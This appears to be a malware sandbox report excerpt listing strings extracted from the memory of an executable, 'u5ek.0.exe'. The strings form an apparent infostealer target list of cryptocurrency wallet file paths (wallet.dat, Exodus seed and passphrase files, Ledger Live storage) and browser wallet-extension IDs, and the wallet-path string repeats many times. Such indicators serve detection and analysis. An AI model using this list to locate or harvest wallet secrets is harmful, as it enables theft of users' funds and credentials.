Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5ek.0.exe, 00000001.00000002.2160907832.000000000432A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MetaMask\|djclckkglechooblngghdinmeemkbgci\|1\|0\|0\|MetaMask\|ejbalbakoplchlghecdalmeeeajnimhm\|1\|0\|0\|MetaMask\|nkbihfbeogaeaoehlefnkodbefgpgknn\|1\|0\|0\|TronLink\|ibnejdfjmmkpcnlpebklmnkoeoihofec\|1\|0\|0\|Binance Wallet\|fhbohimaelbohpjbbldcngcnapndodjp\|1\|0\|0\|Yoroi\|ffnbelfdoeiohenkjibnmadjiehjhajb\|1\|0\|0\|Coinbase Wallet extension\|hnfanknocfeofbddgcijnmhnfnkdnaad\|1\|0\|1\|Guarda\|hpglfhgfnhbgpjdenjgmdgoeiappafln\|1\|0\|0\|Jaxx Liberty\|cjelfplplebdjjenllpjcblmjkfcffne\|1\|0\|0\|iWallet\|kncchdigobghenbbaddojjnnaogfppfj\|1\|0\|0\|MEW CX\|nlbmnnijcnlegkjjpcfjclmcfggfefdm\|1\|0\|0\|GuildWallet\|nanjmdknhkinifnkgdcggcfnhdaammmj\|1\|0\|0\|Ronin Wallet\|fnjhmkhhmkbjkkabndcnnogagogbneec\|1\|0\|0\|NeoLine\|cphhlgmgameodnhkjdmkpanlelnlohao\|1\|0\|0\|CLV Wallet\|nhnkbkgjikgcigadomkphalanndcapjk\|1\|0\|0\|Liquality Wallet\|kpfopkelmapcoipemfendmdcghnegimn\|1\|0\|0\|Terra Station Wallet\|aiifbnbfobpmeekipheeijimdpnlpgpp\|1\|0\|0\|Keplr\|dmkamcknogkgcdfhhbddcghachkejeap\|1\|0\|0\|Sollet\|fhmfendgdocmcbmfikdcogofphimnkno\|1\|0\|0\|Auro Wallet(Mina Protocol)\|cnmamaachppnkjgnildpdmkaakejnhae\|1\|0\|0\|Polymesh Wallet\|jojhfeoedkpkglbfimdfabpdfjaoolaf\|1\|0\|0\|ICONex\|flpiciilemghbmfalicajoolhkkenfel\|1\|0\|0\|Coin98 Wallet\|aeachknmefphepccionboohckonoeemg\|1\|0\|0\|EVER Wallet\|cgeeodpfagjceefieflmdfphplkenlfk\|1\|0\|0\|KardiaChain Wallet\|pdadjkfkgcafgbceimcpbkalnfnepbnk\|1\|0\|0\|Rabby\|acmacodkjbdgmoleebolmdjonilkdbch\|1\|0\|0\|Phantom\|bfnaelmomeimhlpmgjnjophhpkkoljpa\|1\|0\|0\|Brave Wallet\|odbfpeeihdkbihmopkbjmoonfanlbfcl\|1\|0\|0\|Oxygen\|fhilaheimglignddkjgofkcbgekhenbh\|1\|0\|0\|Pali Wallet\|mgffkfbidihjpoaomajlbgchddlicgpn\|1\|0\|0\|BOLT X\|aodkkagnadcbobfpggfnjeongemjbjca\|1\|0\|0\|XDEFI Wallet\|hmeobnfnfcmdkdcmlblgagmfpfboieaf\|1\|0\|0\|Nami\|lpfcbjknijpeeillifnkikgncikgfhdo\|1\|0\|0\|Maiar DeFi Wallet\|dngmlblcodfobpdpecaadgfbcggfjfnm\|1\|0\|0\|Keeper Wallet\|lpilbniiabackdjcionkobglmddfbcjo\|1\|0\|0\|Solflare Wallet\|bhhhlbepdkbapadjdnnojkbgioiodbic\|1\|0\|0\|Cyano Wallet\|dkdedlpgdmmkkfjabffeganieamfklkm\|1\|0\|0\|KHC\|hcflpincpppdclinealmandijcmnkbgn\|1\|0\|0\|TezBox\|mnfifefkajgofkcjkemidiaecocnkjeh\|1\|0\|0\|Temple\|ookjlbkiijinhpmnjffcofjonbfbgaoc\|1\|0\|0\|Goby\|jnkelfanjkeadonecabehalmbgpfodjm\|1\|0\|0\|Ronin Wallet\|kjmoohlgokccodicjjfebfomlbljgfhk\|1\|0\|0\|Byone\|nlgbhdfgdhgbiamfdfmbikcdghidoadd\|1\|0\|0\|OneKey\|jnmbobjmhlngoefaiojfljckilhhlhcj\|1\|0\|0\|DAppPlay\|lodccjjbdhfakaekdiahmedfbieldgik\|1\|0\|0\|SteemKeychain\|jhgnbkkipaallpehbohjmkbjofjdmeid\|1\|0\|0\|Braavos Wallet\|jnlgamecbpmbajjfhmmmlhejkemejdma\|1\|0\|0\|Enkrypt\|kkpllkodjeloidieedojogacfhpaihoh\|1\|1\|1\|OKX Wallet\|mcohilncbfahbmgdjkbpemcciiolgcge\|1\|0\|0\|Sender Wallet\|epapihdplajcdnnkdeiahlgigofloibg\|1\|0\|0\|Hashpack\|gjagmgiddbbciopjhllkdnddhcglnemk\|1\|0\|0\|Eternl\|kmhcihpebfmpgmihbkipmjlmmioameka\|1\|0\|0\|Pontem Aptos Wallet\|phkbamefinggmakgklpkljjmgibohnba\|1\|0\|0\|Petra Aptos Wallet\|ejjladinnckdgjemekebdpeokbikhfci\|1\|0\|0\|Martian Aptos Wallet\|efbglgofoippbgcjepnhiblaibcnclgk\|1\|0\|0\|Finnie\|cjmkndjhnagcfbpiemnkdpomccnjblmj\|1\|0\|0\|Leap Terra Wallet\|aijcbedoijmgnlmjeegjaglmepbmpkpi\|1\|0\|0\|Trezor Password Manager\|imloifkgjagghnncjkhggdhalmcnfklk\|1\|0\|0\|Authenticator\|bhghoamapcdpbohphigoooaddinpkbai\|1\|0\|0\|
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
